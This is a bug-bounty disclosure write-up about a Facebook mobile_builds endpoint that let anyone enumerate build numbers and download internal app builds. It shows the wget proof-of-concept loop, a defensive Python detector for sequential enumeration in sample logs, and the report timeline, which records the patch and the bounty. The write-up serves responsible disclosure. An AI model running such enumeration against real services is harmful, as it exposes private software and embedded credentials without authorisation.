Facebook serves mobile apps, modules, firmware and packages via a few utility endpoints. One of these is m.facebook.com/mobile_builds. Through a specific misconfiguration it was possible to use a variation of this URL to download local, profile, in-house and development builds for numerous Facebook, Instagram, Workplace, Portal and Oculus products. The proof of concept sent to Facebook was a simple bash loop:

#!/usr/bin/env bash
# Walk 101 consecutive build numbers. --content-disposition saves each hit under the
# filename the server supplies, so the build's own name (IPA/APK/etc.) is preserved.
# The cookie values were stripped before publishing; the header is kept as sent.
for i in {183448000..183448100}
do
  wget "https://m.facebook.com/mobile_builds/?build_number=$i&no_fw=1" --header='cookie: sb=; datr=; fr=; dpr=2' --content-disposition
done

Changing the range of build numbers allowed one to query for past builds since 2019 or request builds as recent as March 2021. IPAs, APKs, internal Windows and experimental Oculus packages were also found in the dump. A few internal apps also held auth tokens for Facebook’s interngraph.intern.facebook.com endpoint.
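The loop works because build_number is a dense, sequential identifier: anyone who can reach the endpoint can walk it. On the serving side that same property is what makes the abuse easy to spot. The following is an added example, not code from the original report or from Facebook: it scans constructed access-log lines (the log format is an assumption) for clients that request consecutive build_number values and reports how many of those requests actually returned a build.

```python
"""Detect sequential enumeration of build_number against /mobile_builds/ in access logs."""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed sample log lines (not real Facebook logs): "<client> GET <path> <status>".
# 203.0.113.10 walks six consecutive build numbers; 198.51.100.7 fetches two.
SAMPLE_LOG = """\
203.0.113.10 GET /mobile_builds/?build_number=183448000&no_fw=1 200
203.0.113.10 GET /mobile_builds/?build_number=183448001&no_fw=1 200
203.0.113.10 GET /mobile_builds/?build_number=183448002&no_fw=1 404
203.0.113.10 GET /mobile_builds/?build_number=183448003&no_fw=1 200
203.0.113.10 GET /mobile_builds/?build_number=183448004&no_fw=1 200
203.0.113.10 GET /mobile_builds/?build_number=183448005&no_fw=1 200
198.51.100.7 GET /mobile_builds/?build_number=183448050&no_fw=1 200
198.51.100.7 GET /mobile_builds/?build_number=183448051&no_fw=1 200
"""

# Assumed line layout: client, method, path, status. Only /mobile_builds/ requests matter.
LINE_RE = re.compile(r'^(?P<ip>\S+) GET (?P<path>/mobile_builds/\?\S*) (?P<status>\d{3})$')
BUILD_RE = re.compile(r'[?&]build_number=(\d+)')


def parse(log: str) -> Dict[str, List[Tuple[int, int]]]:
    """Return {client: [(build_number, http_status), ...]} in log order."""
    hits: Dict[str, List[Tuple[int, int]]] = defaultdict(list)
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        b = BUILD_RE.search(m['path'])
        if not b:
            continue
        hits[m['ip']].append((int(b.group(1)), int(m['status'])))
    return hits


def longest_sequential_run(numbers: List[int]) -> int:
    """Length of the longest run of build numbers that each increase by exactly 1."""
    best = run = 1 if numbers else 0
    for prev, cur in zip(numbers, numbers[1:]):
        run = run + 1 if cur == prev + 1 else 1
        best = max(best, run)
    return best


def flag_enumerators(log: str, min_run: int = 5) -> Dict[str, dict]:
    """Clients whose requests walk at least min_run consecutive build numbers.

    A 404 in the middle of the walk still counts toward the run: the signal is the
    walk itself, not whether every number happened to resolve to a build.
    """
    flagged = {}
    for ip, reqs in parse(log).items():
        run = longest_sequential_run([n for n, _ in reqs])
        if run >= min_run:
            flagged[ip] = {
                "requests": len(reqs),
                "longest_run": run,
                "downloads": sum(1 for _, status in reqs if status == 200),
            }
    return flagged


if __name__ == "__main__":
    for ip, info in flag_enumerators(SAMPLE_LOG).items():
        print(f"{ip}: {info['requests']} requests, run of {info['longest_run']}, "
              f"{info['downloads']} successful downloads")
```

The threshold of five is arbitrary; the point is that a legitimate client fetching one build it was given a link to never walks the number space, so even a short consecutive run from one client is worth an alert.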

Impact (A verbatim explanation of the bounty by Facebook):

This could have let a malicious user access our internal mobile builds.

Timeline

Mar 31, 2021 4:43 pm – Report sent
Mar 31, 2021 6:04 pm – Confirmation of submission by Facebook
“We’ve managed to reproduce your report and will get back to you once we have had a chance to investigate. In the meantime could you please stop further testing on this? As always, we’ll evaluate the full impact of the issue from our side and let you know 🙂”
Mar 31, 2021 6:36 pm – Further investigation of submission by Facebook
Mar 31, 2021 7:31 pm – Confirmation of patch by Facebook
Apr 26, 2021 – $6000 Bounty awarded by Facebook